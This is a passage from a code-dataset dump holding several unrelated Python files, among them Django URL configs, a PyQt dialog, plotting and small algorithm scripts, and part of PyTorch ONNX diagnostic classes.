positions of window onto the document.\n \"\"\"\n\n arr: np.ndarray\n pos: Optional[Tuple]\n similarity_score: float = None\n\n\nclass SimRepresentation(NamedTuple):\n \"\"\"\n Contains numerical representation and similarity scores for a document.\n\n Attributes:\n doc_representation: Numerical representation of the entire document.\n #features: Optional list of features (tokens) in the document.\n #comparison_features: Optional list of features (tokens) used for comparison.\n comparison_array: Numerical array used for comparison.\n window_repr: Optional list of WindowInfo objects, representing various windows in the document.\n name: Optional string descripting the type of the representation used to compare the documents\n \"\"\"\n\n doc_representation: np.ndarray\n #features: Optional[list] = None\n #comparison_features: Optional[list] = None\n comparison_array: Optional[np.ndarray] = None\n window_repr: Optional[List[WindowRepresentation]] = None\n name: Optional[str] = None\n\n\nclass WindowProp(NamedTuple):\n window_size: Optional[int] = None\n window_overlap: Optional[int] = None\n window_shift: Optional[int] = None\n window_type: Optional[str] = None # 'sentence', 'paragraph', 'document'\n\nclass DocumentWrapper(NamedTuple):\n \"\"\"\n Wraps a SpaCy Doc object and its various numerical representations.\n\n Attributes:\n doc: Original SpaCy Doc object.\n bow: Bag-of-Words representation and related information.\n word2vec: Word2Vec representation and related information.\n glove: GloVe representation and related information.\n \"\"\"\n\n doc: Doc\n bow: Optional[SimRepresentation] = None\n word2vec: Optional[SimRepresentation] = None\n glove: Optional[SimRepresentation] = None\n window_prop: Optional[WindowProp] = None\n\n\ndef sorted_windows_scores(\n document_wrapper: DocumentWrapper, representation_type: Optional[str] = None\n) -> DocumentWrapper:\n \"\"\"Sorts windows in decending order based on their similarity scores.\n document_wrapper: DocumentWrapper instance\n representation_type: Optional[str]: if None (default), all representations are sorted.\n If 'bow', 'word2vec', or 'glove', only the specified representation is sorted.\n \"\"\"\n def sort_windows(sim_rep: SimRepresentation) -> SimRepresentation:\n sorted_window_repr = sorted(\n sim_rep.window_repr, key=lambda x: x.similarity_score, 
reverse=True\n )\n return sim_rep._replace(window_repr=sorted_window_repr)\n\n if representation_type:\n if representation_type not in [\"bow\", \"word2vec\", \"glove\"]:\n raise ValueError(\n \"Invalid representation_type. Choose from 'bow', 'word2vec', 'glove'.\"\n )\n sim_rep = getattr(document_wrapper, representation_type)\n updated_sim_rep = sort_windows(sim_rep)\n document_wrapper = document_wrapper._replace(**{representation_type: updated_sim_rep})\n else:\n for rep_type in [\"bow\", \"word2vec\", \"glove\"]:\n sim_rep = getattr(document_wrapper, rep_type)\n if sim_rep:\n updated_sim_rep = sort_windows(sim_rep)\n document_wrapper = document_wrapper._replace(**{rep_type: updated_sim_rep})\n\n return document_wrapper\n\n","repo_name":"reinasta/axidoc","sub_path":"src/axidoc/doctypes.py","file_name":"doctypes.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71412655788","text":"from django.urls import path\nfrom .views import index, add_forum, delete_forum, add_flutter, json_flutter\n\nurlpatterns = [\n path('', index, name='index'),\n path('add-forum/', add_forum, name='add_forum'),\n path('delete-forum/',delete_forum, name='delete_forum' ),\n path('webservice-forum', add_flutter, name='add_flutter'),\n path('json', json_flutter, name='json'),\n]","repo_name":"dionmkls/pbp-d05-web","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36175478746","text":"\"\"\"\nInput: nums = [-1,0,1,2,-1,-4]\nOutput: [[-1,-1,2],[-1,0,1]]\n\nWe will use 3 pointers (3 for-loops), but it's not the logic of actual 3 pointers concept.\nThat is in Threepointer.py\n\"\"\"\n\n# THIS SOLUTION WON'T WORK AS THE TIME EXCEEDS\n\nfrom typing import List\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n combinations = []\n nums = sorted(nums)\n for i in range(len(nums) - 2):\n for j in range(i + 1, len(nums) - 1):\n for k in range(j + 1, len(nums)):\n if nums[i] + nums[j] + nums[k] == 0 and [nums[i], nums[j], nums[k]] not in combinations:\n combinations.append([nums[i], nums[j], nums[k]])\n\n return combinations\n\n\nprint(Solution().threeSum([-4, -1, -1, 0, 1, 2]))\n# Solution().threeSum([-1, 0, 1, 2, -1, -4])\n","repo_name":"sandeep194920/Leetcode","sub_path":"12-15.3_Sum(M)/BruteForce.py","file_name":"BruteForce.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14984855796","text":"import pandas as pd\nimport argparse\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom .. 
import transforms\nfrom ..constants import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--labelsize', type=int, default=24)\nargs = parser.parse_args()\n\n\nblosum62_df = pd.DataFrame(transforms.NORMALIZED_BLOSUM62)\nblosum62_df.columns = AMINO_ACIDS\nblosum62_df.index = AMINO_ACIDS\n\nprint(blosum62_df.round(3))\nprint('Mean: ', round(blosum62_df.values.flatten().mean(), 3))\nprint('Std: ', round(blosum62_df.values.flatten().std(), 3))\nplt.hist(blosum62_df.values.flatten())\nplt.savefig('blosum62_hist.png')\n\ngrid_kws = {\"width_ratios\": (.9, .05), \"wspace\": .3}\nfig, (ax, cbar_ax) = plt.subplots(ncols=2, figsize=(15,12), gridspec_kw=grid_kws)\nsns.heatmap(\n blosum62_df,\n annot=True,\n linewidths=2,\n cmap=\"BuPu\",\n ax=ax,\n cbar_ax=cbar_ax,\n)\n\nax.xaxis.tick_top()\nax.xaxis.set_label_position('top')\nax.tick_params(labelsize=args.labelsize)\ncbar_ax.tick_params(labelsize=args.labelsize)\n\nplt.savefig('blosum62_scaled.png')\nplt.clf()\nplt.close()\n\naaindex_ids = sorted([\n # Normalized frequency of alpha-helix (Chou-Fasman, 1978b)\n 'CHOP780201',\n # Normalized frequency of beta-sheet (Chou-Fasman, 1978b)\n 'CHOP780202',\n # Normalized frequency of beta-turn (Chou-Fasman, 1978b)\n 'CHOP780203',\n # Normalized van der Waals volume (Fauchere et al., 1988)\n 'FAUJ880103',\n 'KLEP840101', # Net charge (Klein et al., 1984)\n 'KYTJ820101', # Hydropathy index (Kyte-Doolittle, 1982)\n 'MITS020101', # Amphiphilicity index (Mitaku et al., 2002)\n 'RADA880108', # Mean polarity (Radzicka-Wolfenden, 1988)\n 'CHAM810101', # Steric parameter (Charton, 1981)\n 'CHAM830107', # A parameter of charge transfer capability (Charton-Charton, 1983)\n 'JANJ780101', # Average accessible surface area (Janin et al., 1978)\n 'MEIH800103', # Average side chain orientation angle (Meirovitch et al., 1980)\n 'VELV850101', # Electron-ion interaction potential (Veljkovic et al., 1985)\n 'WERD780101', # Propensity to be buried inside (Wertz-Scheraga, 1978)\n 'ZIMJ680105', # RF rank (Zimmerman et al., 1968)\n 'ZIMJ680104', # Isoelectric point (Zimmerman et al., 1968)\n])\n\naaindex = (transforms.FeatureEncoder(aaindex_ids=aaindex_ids)).aaindex\n\naaindex_df = pd.DataFrame(aaindex)\naaindex_df.columns = aaindex_ids\naaindex_df.index = AMINO_ACIDS\n\naaindex_df = aaindex_df.transpose()\n\ngrid_kws = {\"width_ratios\": (.9, .05), \"wspace\": .3}\nfig, (ax, cbar_ax) = plt.subplots(ncols=2, figsize=(20,12), gridspec_kw=grid_kws)\nsns.heatmap(\n aaindex_df,\n annot=True,\n linewidths=2,\n cmap=\"BuPu\",\n ax=ax,\n cbar_ax=cbar_ax,\n)\n\nax.xaxis.tick_top()\nax.xaxis.set_label_position('top')\nax.tick_params(labelsize=args.labelsize)\ncbar_ax.tick_params(labelsize=args.labelsize)\n\nplt.tight_layout()\nplt.savefig('aaindex_scaled.png')","repo_name":"pbl2021-signal-peptides/pbl21-signal-peptides","sub_path":"multimodal_dnn/plots/plot_input_embeddings.py","file_name":"plot_input_embeddings.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13899349177","text":"import prompt\nfrom random import randint\nfrom brain_games.implementer import defeat_message\nfrom brain_games.implementer import victory_message\n\n\ndef correct_answer(number):\n if number % 2 == 0:\n return 'yes'\n return 'no'\n\n\ndef user_answer(number):\n print('Question: {}'.format(number))\n global answer\n answer = prompt.string('Your answer: ')\n return answer\n\n\ndef even_number():\n round_game = 0\n print('Answer \"yes\" if the 
number is even, otherwise answer \"no\".')\n while round_game < 3:\n number = randint(1, 99)\n if correct_answer(number) == user_answer(number):\n print('Correct!')\n round_game += 1\n else:\n return print(defeat_message(answer, correct_answer(number)))\n return print(victory_message())\n","repo_name":"sh00tsim/python-project-lvl1","sub_path":"brain_games/games/even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3478299936","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom app_restaurant.views import django_404, django_500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('app_restaurant.urls')),\n path('members/', include('django.contrib.auth.urls')),\n path('members/', include ('members.urls')),\n]\n\n# Custom Error Pages\nhandler404 = django_404\nhandler500 = django_500\n\n# Configure Admin Titles\nadmin.site.site_header = 'Restaurant Django Administration Page'\n","repo_name":"bianca9901/django-project","sub_path":"project_restaurant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32603201631","text":"import typing\n\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSlot, QModelIndex\n\nfrom fgo.ui.AiScenariosDialog import Ui_AiScenarioDialog\n\nclass AiScenariosDialog(QDialog):\n def __init__(self, all_scenarios: typing.List[str], selected_scenarios: typing.List[str]):\n super(QDialog, self).__init__()\n self.ui = Ui_AiScenarioDialog()\n self.ui.setupUi(self)\n self.populate_lists(all_scenarios, selected_scenarios)\n self._selected_active_item = None\n self._selected_available_item = None\n\n def populate_lists(self, all_scenarios: typing.List[str], selected_scenarios: typing.List[str]):\n for item in selected_scenarios:\n self.ui.lwActive.addItem(item)\n\n not_selected = [x for x in all_scenarios if x not in selected_scenarios]\n\n for item in not_selected:\n self.ui.lwAvailable.addItem(item)\n\n @pyqtSlot(QModelIndex)\n def on_lwAvailable_clicked(self, index):\n self._selected_available_item = index.row()\n self.ui.pbAdd.setEnabled(True)\n\n @pyqtSlot()\n def on_pbAdd_clicked(self):\n index = self._selected_available_item\n item = self.ui.lwAvailable.takeItem(index)\n self.ui.lwActive.addItem(item)\n self._selected_available_item = None\n self.ui.pbAdd.setEnabled(False)\n\n @pyqtSlot(QModelIndex)\n def on_lwActive_clicked(self, index):\n self._selected_active_item = index.row()\n self.ui.pbRemove.setEnabled(True)\n\n @pyqtSlot()\n def on_pbRemove_clicked(self):\n index = self._selected_active_item\n item = self.ui.lwActive.takeItem(index)\n self.ui.lwAvailable.addItem(item)\n self._selected_active_item = None\n self.ui.pbRemove.setEnabled(False)\n\n def _get_selected_scenarios(self) -> typing.List[str]:\n res = []\n for item in [self.ui.lwActive.item(i).text() for i in range(0, self.ui.lwActive.count(), 1)]:\n res.append(item)\n return res\n\n def exec_(self) -> typing.Union[list, bool]:\n button_res = super(AiScenariosDialog, self).exec_()\n selection = self._get_selected_scenarios()\n return selection, button_res\n\n @staticmethod\n def getValues(all_scenarios: list, selected_scenarios: list):\n dialog = AiScenariosDialog(all_scenarios, selected_scenarios)\n return 
dialog.exec_()\n","repo_name":"cgspeck/fg-orchestrator","sub_path":"fgo/director/ai_scenarios_dialog.py","file_name":"ai_scenarios_dialog.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23299774758","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets\nprint(\"Hello Logistic Regression\")\n\nfrom util import create_dataset \n\nx,y = create_dataset(100, insert_x0=False)\nlearning_rate = 0.01\nn = len(x)\nw = np.array([0,0])\ndef error(x,y,w):\n n = len(x)\n err = 0\n for i in range(0,n):\n err += np.log(1 + np.exp(np.dot(-y[i]*w.T,x[i])))\n err = err / n\n return err\n\nerr = err = error(x,y,w)\niter = 0\nmax_iter = 1000\nwhile err > 0.01 and iter < max_iter:\n iter += 1\n d_err = 0\n for i in range(0, n):\n d_err += y[i]*x[i] / (1 + np.exp(y[i]*np.dot(np.transpose(w),x[i])))\n d_err /= -n\n w = w - learning_rate * d_err\n err = error(x,y,w)\n\nprint(w)\n_, axis = plt.subplots()\n\nstep = 0.05\nx1_min, x1_max = x[:, 0].min() - 1, x[:, 0].max() + 1\nx2_min, x2_max = x[:, 1].min() - 1, x[:, 1].max() + 1\nx_mesh, y_mesh = np.meshgrid(np.arange(x1_min, x1_max, step), np.arange(x2_min, x2_max, step))\nx_mesh_flattened = x_mesh.flatten()\ny_mesh_flattened = y_mesh.flatten()\ncfdata = np.transpose(np.array((x_mesh_flattened, y_mesh_flattened)))\nclassification = ((np.sign(np.dot(cfdata, w))+1)/2).reshape(x_mesh.shape)\n# draw boundaries\naxis.contourf(x_mesh, y_mesh, classification, cmap=plt.cm.Paired)\n# draw points\naxis.scatter(x[:, 0], x[:, 1], marker='x', c=y)\naxis.set_title('Logistic Regression')\naxis.axis('off')\naxis.set_aspect('equal', 'datalim')\nplt.show()\n\n","repo_name":"cdietrich/ml-playground","sub_path":"pure-python/classification/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267993114","text":"from PyQt5 import QtWidgets\n\nimport vqt.saveable as vq_save\nimport vui.qtrace\n\n\nclass VdbWidgetWindow(QtWidgets.QWidget, vq_save.SaveableWidget, vui.qtrace.VQTraceNotifier):\n \"\"\"\n a base window class for widgets to inherit from for vdb.\n this gives your window/widget access to the vdb instance (self.db), the gui\n instance (self.db.gui), and the persistent trace object (self.dbt).\n\n implement vqLoad for tracer events.\n implement vdbUIEvent for events caused by user interaction.\n state between runs of the debugger.\n \"\"\"\n\n def __init__(self, db, dbt, parent=None):\n QtWidgets.QWidget.__init__(self, parent=parent)\n vq_save.SaveableWidget.__init__(self)\n vui.qtrace.VQTraceNotifier.__init__(self, trace=dbt)\n\n self.db = db\n self.dbt = dbt\n\n def keyPressEvent(self, event):\n \"\"\"\n handle the global hotkeys.\n \"\"\"\n self.db.gui.keyPressEvent(event)\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"vui/vdb/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"21233607274","text":"import re \n\n#script to get a string input of a few coordinates, and output the standard form equation for that circle\n\n\ndef checkio(data):\n #data is a string so number only come in certain parts of the array, then I convert them all to integers to perform path\n x1 =int(data[1])\n y1 =int(data[3])\n \n 
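The logistic-regression script above accumulates the gradient one sample at a time in a Python loop. For the same loss, the mean of log(1 + exp(-y_i w·x_i)) with labels in {-1, +1}, the gradient collapses to a single matrix product. The sketch below shows that vectorized form; it is only an illustration, and the small synthetic dataset stands in for the script's create_dataset helper, whose exact output is not shown here.

import numpy as np

rng = np.random.default_rng(0)

# Stand-in for create_dataset (assumption: two features, labels in {-1, +1});
# any roughly linearly separable data works for this demonstration.
n = 100
x = np.vstack([rng.normal(-1.0, 1.0, (n // 2, 2)), rng.normal(1.0, 1.0, (n // 2, 2))])
y = np.hstack([-np.ones(n // 2), np.ones(n // 2)])

w = np.zeros(2)
learning_rate = 0.01

def error(x, y, w):
    # mean logistic loss over all samples, with no Python loop
    return np.mean(np.log1p(np.exp(-y * (x @ w))))

for _ in range(1000):
    if error(x, y, w) <= 0.01:
        break
    margins = y * (x @ w)                 # y_i * w.x_i, shape (n,)
    coeff = -y / (1.0 + np.exp(margins))  # per-sample gradient weight
    grad = x.T @ coeff / len(x)           # same d_err as the loop version computes
    w = w - learning_rate * grad

print(w)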
x2 =int(data[7])\n y2 =int(data[9])\n \n x3 =int(data[13])\n y3 =int(data[15])\n \n #equations to determine the 4 parts of a circle equation, used later to convert to standard form\n #equations found here http://www.ambrsoft.com/trigocalc/circle3d.htm\n A = x1*(y2-y3)-y1*(x2-x3)+x2*y3-x3*y2\n B = (x1**2+y1**2)*(y3-y2)+(x2**2+y2**2)*(y1-y3)+(x3**2+y3**2)*(y2-y1)\n C = (x1**2+y1**2)*(x2-x3)+(x2**2+y2**2)*(x3-x1)+(x3**2+y3**2)*(x1-x2)\n D = (x1**2+y1**2)*(x3*y2-x2*y3)+(x2**2+y2**2)*(x1*y3-x3*y1)+(x3**2+y3**2)*(x2*y1-x1*y2)\n \n #Using ABCD I can then calculate the radius and x/y coordinate\n r = (((B**2+C**2)-(4*A*D))/(4*(A**2)))**(0.5)\n x = (0-(B/(2*A)))\n y = (0-(C/(2*A)))\n \n #This 'checker' for this script requires that all tailing zeros are removed, so 3.0 will not work. This converts 3.0 to 3, etc\n if (x.is_integer()):\n x = int(x)\n if (y.is_integer()):\n y = int(y)\n if (r.is_integer()):\n r = int(r)\n \n #round output to 2 decimal places \n r = round(r, 2) \n x = round(x, 2)\n y = round(y, 2)\n \n #printing our vairables for testing\n print (\"A is: \",A)\n print (\"B is: \",B)\n print (\"C is: \",C)\n print (\"D is: \",D)\n print (\"r is: \",r)\n print (\"x is: \",x)\n print (\"y is: \",y)\n \n #craft a string using our variables to make a circle equation in standard form\n answer = ('(x-' + str(x) + ')^2+(y-' + str(y) + ')^2=' + str(r) + '^2')\n print (answer)\n\n return (answer)\n #plot.savefig('hanning' + str(num) + '.pdf')\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(\"(2,2),(6,2),(2,6)\") == \"(x-4)^2+(y-4)^2=2.83^2\"\n assert checkio(\"(3,7),(6,9),(9,7)\") == \"(x-6)^2+(y-5.75)^2=3.25^2\"\n","repo_name":"tylerwight/Py-Scripts","sub_path":"Circle-from-points.py","file_name":"Circle-from-points.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29060705662","text":"import os \r\n\r\nnumber = []\r\nfor i in range(1,41):\r\n if i in range(1,10):\r\n number.append('0'+'{}'.format(i))\r\n else:\r\n number.append('{}'.format(i))\r\n\r\nfor i in number:\r\n os.makedirs('./images/test'+'/'+ 'Action_'+i)#create 40 class (action) document in the test document\r\n os.makedirs('./images/train'+'/'+ 'Action_'+i)#create 40 class (action) document in the train document\r\n","repo_name":"GMBAKEN/Recognation-of-Humain-Movements","sub_path":"DocumentCreator.py","file_name":"DocumentCreator.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30804907107","text":"# -*- coding: utf-8 -*-\nimport pyside2uic as pui\nfrom os.path import normpath, dirname, join\n\nfiles = {'main_window': 'UI_main.ui', }\nfolder = dirname(__file__)\nfor f in files:\n obj = normpath(join(folder, files.get(f)))\n out = normpath('{}.py'.format(join(folder, f)))\n pyfile = open(out, 'w')\n # print(obj, ' ', out)\n pui.compileUi(obj, pyfile)\n","repo_name":"udushkudush/videocuter","sub_path":"video_cutter/convert_ui.py","file_name":"convert_ui.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30351878920","text":"\"\"\"This file defines an additional layer of abstraction on top of the SARIF OM.\"\"\"\n\nfrom __future__ import annotations\n\nimport dataclasses\nimport enum\nfrom typing import FrozenSet, List, Optional, Sequence, 
Tuple, Type, TypeVar\n\nfrom torch.onnx._internal.diagnostics.infra import formatter, sarif\n\n\nclass Level(enum.Enum):\n \"\"\"The level of a diagnostic.\n\n This class is used to represent the level of a diagnostic. The levels are defined\n by the SARIF specification, and are not modifiable. For alternative categories,\n please use infra.Tag instead.\n \"\"\"\n\n NONE = enum.auto()\n NOTE = enum.auto()\n WARNING = enum.auto()\n ERROR = enum.auto()\n\n\nlevels = Level\n\n\nclass Tag(enum.Enum):\n \"\"\"The tag of a diagnostic. This class can be inherited to define custom tags.\"\"\"\n\n pass\n\n\nclass PatchedPropertyBag(sarif.PropertyBag):\n \"\"\"Key/value pairs that provide additional information about the object.\n\n The definition of PropertyBag via SARIF spec is \"A property bag is an object (§3.6)\n containing an unordered set of properties with arbitrary names.\" However it is not\n reflected in the json file, and therefore not captured by the python representation.\n This patch adds additional **kwargs to the `__init__` method to allow recording\n arbitrary key/value pairs.\n \"\"\"\n\n def __init__(self, tags: Optional[List[str]] = None, **kwargs):\n super().__init__(tags=tags)\n self.__dict__.update(kwargs)\n\n\n@dataclasses.dataclass(frozen=True)\nclass Rule:\n id: str\n name: str\n message_default_template: str\n short_description: Optional[str] = None\n full_description: Optional[str] = None\n full_description_markdown: Optional[str] = None\n help_uri: Optional[str] = None\n\n @classmethod\n def from_sarif(cls, **kwargs):\n \"\"\"Returns a rule from the SARIF reporting descriptor.\"\"\"\n short_description = kwargs.get(\"short_description\", {}).get(\"text\")\n full_description = kwargs.get(\"full_description\", {}).get(\"text\")\n full_description_markdown = kwargs.get(\"full_description\", {}).get(\"markdown\")\n help_uri = kwargs.get(\"help_uri\")\n\n rule = cls(\n id=kwargs[\"id\"],\n name=kwargs[\"name\"],\n message_default_template=kwargs[\"message_strings\"][\"default\"][\"text\"],\n short_description=short_description,\n full_description=full_description,\n full_description_markdown=full_description_markdown,\n help_uri=help_uri,\n )\n return rule\n\n def sarif(self) -> sarif.ReportingDescriptor:\n \"\"\"Returns a SARIF reporting descriptor of this Rule.\"\"\"\n short_description = (\n sarif.MultiformatMessageString(text=self.short_description)\n if self.short_description is not None\n else None\n )\n full_description = (\n sarif.MultiformatMessageString(\n text=self.full_description, markdown=self.full_description_markdown\n )\n if self.full_description is not None\n else None\n )\n return sarif.ReportingDescriptor(\n id=self.id,\n name=self.name,\n short_description=short_description,\n full_description=full_description,\n help_uri=self.help_uri,\n )\n\n def format_message(self, *args, **kwargs) -> str:\n \"\"\"Returns the formatted default message of this Rule.\n\n This method should be overridden (with code generation) by subclasses to reflect\n the exact arguments needed by the message template. 
This is a helper method to\n create the default message for a diagnostic.\n \"\"\"\n return self.message_default_template.format(*args, **kwargs)\n\n def pretty_print(self):\n pass\n\n\n@dataclasses.dataclass\nclass Location:\n uri: Optional[str] = None\n line: Optional[int] = None\n message: Optional[str] = None\n start_column: Optional[int] = None\n end_column: Optional[int] = None\n snippet: Optional[str] = None\n\n def sarif(self) -> sarif.Location:\n \"\"\"Returns the SARIF representation of this location.\"\"\"\n return sarif.Location(\n physical_location=sarif.PhysicalLocation(\n artifact_location=sarif.ArtifactLocation(uri=self.uri),\n region=sarif.Region(\n start_line=self.line,\n start_column=self.start_column,\n end_column=self.end_column,\n snippet=sarif.ArtifactContent(text=self.snippet),\n ),\n ),\n message=sarif.Message(text=self.message)\n if self.message is not None\n else None,\n )\n\n def pretty_print(self):\n \"\"\"Prints the location in a human-readable format.\"\"\"\n location_strs = [\"frame:\"]\n if self.snippet is not None:\n location_strs.append(self.snippet)\n if self.uri is not None:\n line_strs = [self.uri]\n line_strs.append(str(self.line) if self.line is not None else \"-1\")\n line_strs.append(\n str(self.start_column) if self.start_column is not None else \"-1\"\n )\n line_strs.append(\n str(self.end_column) if self.end_column is not None else \"-1\"\n )\n location_strs.append(\":\".join(line_strs))\n if self.message is not None:\n location_strs.append(f\"({self.message})\")\n print(\" \".join(location_strs))\n\n\n@dataclasses.dataclass\nclass StackFrame:\n location: Location\n\n def sarif(self) -> sarif.StackFrame:\n \"\"\"Returns the SARIF representation of this stack frame.\"\"\"\n return sarif.StackFrame(location=self.location.sarif())\n\n def pretty_print(self):\n \"\"\"Prints the stack frame in a human-readable format.\"\"\"\n self.location.pretty_print()\n\n\n@dataclasses.dataclass\nclass Stack:\n frames: List[StackFrame] = dataclasses.field(default_factory=list)\n message: Optional[str] = None\n\n def sarif(self) -> sarif.Stack:\n \"\"\"Returns the SARIF representation of this stack.\"\"\"\n return sarif.Stack(\n frames=[frame.sarif() for frame in self.frames],\n message=sarif.Message(text=self.message)\n if self.message is not None\n else None,\n )\n\n def pretty_print(self):\n \"\"\"Prints the stack in a human-readable format.\"\"\"\n formatter.pretty_print_title(f\"Stack: {self.message}\", fill_char=\"-\")\n for frame in self.frames:\n frame.pretty_print()\n\n\n# This is a workaround for mypy not supporting Self from typing_extensions.\n_Diagnostic = TypeVar(\"_Diagnostic\", bound=\"Diagnostic\")\n\n\n@dataclasses.dataclass\nclass Graph:\n \"\"\"A graph of diagnostics.\n\n This class stores the string representation of a model graph.\n The `nodes` and `edges` fields are unused in the current implementation.\n \"\"\"\n\n graph_str: str\n name: str\n description: Optional[str] = None\n\n def sarif(self) -> sarif.Graph:\n \"\"\"Returns the SARIF representation of this graph.\"\"\"\n return sarif.Graph(\n description=sarif.Message(text=self.graph_str),\n properties=PatchedPropertyBag(name=self.name, description=self.description),\n )\n\n def pretty_print(self):\n pass\n\n\n@dataclasses.dataclass\nclass Diagnostic:\n rule: Rule\n level: Level\n message: Optional[str] = None\n locations: List[Location] = dataclasses.field(default_factory=list)\n stacks: List[Stack] = dataclasses.field(default_factory=list)\n graphs: List[Graph] = 
dataclasses.field(default_factory=list)\n additional_message: Optional[str] = None\n tags: List[Tag] = dataclasses.field(default_factory=list)\n\n def sarif(self) -> sarif.Result:\n \"\"\"Returns the SARIF Result representation of this diagnostic.\"\"\"\n message = self.message or self.rule.message_default_template\n if self.additional_message is not None:\n message = f\"{message}\\n{self.additional_message}\"\n sarif_result = sarif.Result(\n message=sarif.Message(text=message),\n level=self.level.name.lower(), # type: ignore[arg-type]\n rule_id=self.rule.id,\n )\n sarif_result.locations = [location.sarif() for location in self.locations]\n sarif_result.stacks = [stack.sarif() for stack in self.stacks]\n sarif_result.graphs = [graph.sarif() for graph in self.graphs]\n sarif_result.properties = sarif.PropertyBag(\n tags=[tag.value for tag in self.tags]\n )\n return sarif_result\n\n def with_location(self: _Diagnostic, location: Location) -> _Diagnostic:\n \"\"\"Adds a location to the diagnostic.\"\"\"\n self.locations.append(location)\n return self\n\n def with_stack(self: _Diagnostic, stack: Stack) -> _Diagnostic:\n \"\"\"Adds a stack to the diagnostic.\"\"\"\n self.stacks.append(stack)\n return self\n\n def with_graph(self: _Diagnostic, graph: Graph) -> _Diagnostic:\n \"\"\"Adds a graph to the diagnostic.\"\"\"\n self.graphs.append(graph)\n return self\n\n def with_additional_message(self: _Diagnostic, message: str) -> _Diagnostic:\n \"\"\"Adds an additional message to the diagnostic.\"\"\"\n if self.additional_message is None:\n self.additional_message = message\n else:\n self.additional_message = f\"{self.additional_message}\\n{message}\"\n return self\n\n def pretty_print(self, verbose: bool = False, log_level: Level = Level.ERROR):\n \"\"\"Prints the diagnostics in a human-readable format.\n\n Args:\n verbose: If True, prints all information. E.g. stack frames, graphs, etc.\n Otherwise, only prints compact information. 
E.g., rule name and display message.\n level: The minimum level of diagnostics to print.\n \"\"\"\n if self.level.value < log_level.value:\n return\n formatter.pretty_print_item_title(f\"{self.level.name}: {self.rule.name}\")\n print(self.message)\n\n if not verbose:\n print(\"\\n\")\n return\n\n for location in self.locations:\n location.pretty_print()\n for stack in self.stacks:\n stack.pretty_print()\n for graph in self.graphs:\n graph.pretty_print()\n print()\n\n\n@dataclasses.dataclass\nclass RuleCollection:\n _rule_id_name_set: FrozenSet[Tuple[str, str]] = dataclasses.field(init=False)\n\n def __post_init__(self) -> None:\n self._rule_id_name_set = frozenset(\n {\n (field.default.id, field.default.name)\n for field in dataclasses.fields(self)\n if isinstance(field.default, Rule)\n }\n )\n\n def __contains__(self, rule: Rule) -> bool:\n \"\"\"Checks if the rule is in the collection.\"\"\"\n return (rule.id, rule.name) in self._rule_id_name_set\n\n @classmethod\n def custom_collection_from_list(\n cls, new_collection_class_name: str, rules: Sequence[Rule]\n ) -> RuleCollection:\n \"\"\"Creates a custom class inherited from RuleCollection with the list of rules.\"\"\"\n return dataclasses.make_dataclass(\n new_collection_class_name,\n [\n (\n formatter.kebab_case_to_snake_case(rule.name),\n type(rule),\n dataclasses.field(default=rule),\n )\n for rule in rules\n ],\n bases=(cls,),\n )()\n\n\nclass Invocation:\n # TODO: Implement this.\n def __init__(self) -> None:\n raise NotImplementedError()\n\n\n@dataclasses.dataclass\nclass DiagnosticOptions:\n \"\"\"\n Options for diagnostic context.\n \"\"\"\n\n log_verbose: bool = dataclasses.field(default=False)\n log_level: Level = dataclasses.field(default=Level.ERROR)\n\n\n@dataclasses.dataclass\nclass DiagnosticContext:\n name: str\n version: str\n options: DiagnosticOptions = dataclasses.field(default_factory=DiagnosticOptions)\n diagnostic_type: Type[Diagnostic] = dataclasses.field(default=Diagnostic)\n diagnostics: List[Diagnostic] = dataclasses.field(init=False, default_factory=list)\n _invocation: Invocation = dataclasses.field(init=False)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n return True\n\n def sarif(self) -> sarif.Run:\n \"\"\"Returns the SARIF Run object.\"\"\"\n return sarif.Run(\n tool=sarif.Tool(\n driver=sarif.ToolComponent(\n name=self.name,\n version=self.version,\n rules=[diagnostic.rule.sarif() for diagnostic in self.diagnostics],\n )\n ),\n results=[diagnostic.sarif() for diagnostic in self.diagnostics],\n )\n\n def add_diagnostic(self, diagnostic: Diagnostic) -> None:\n 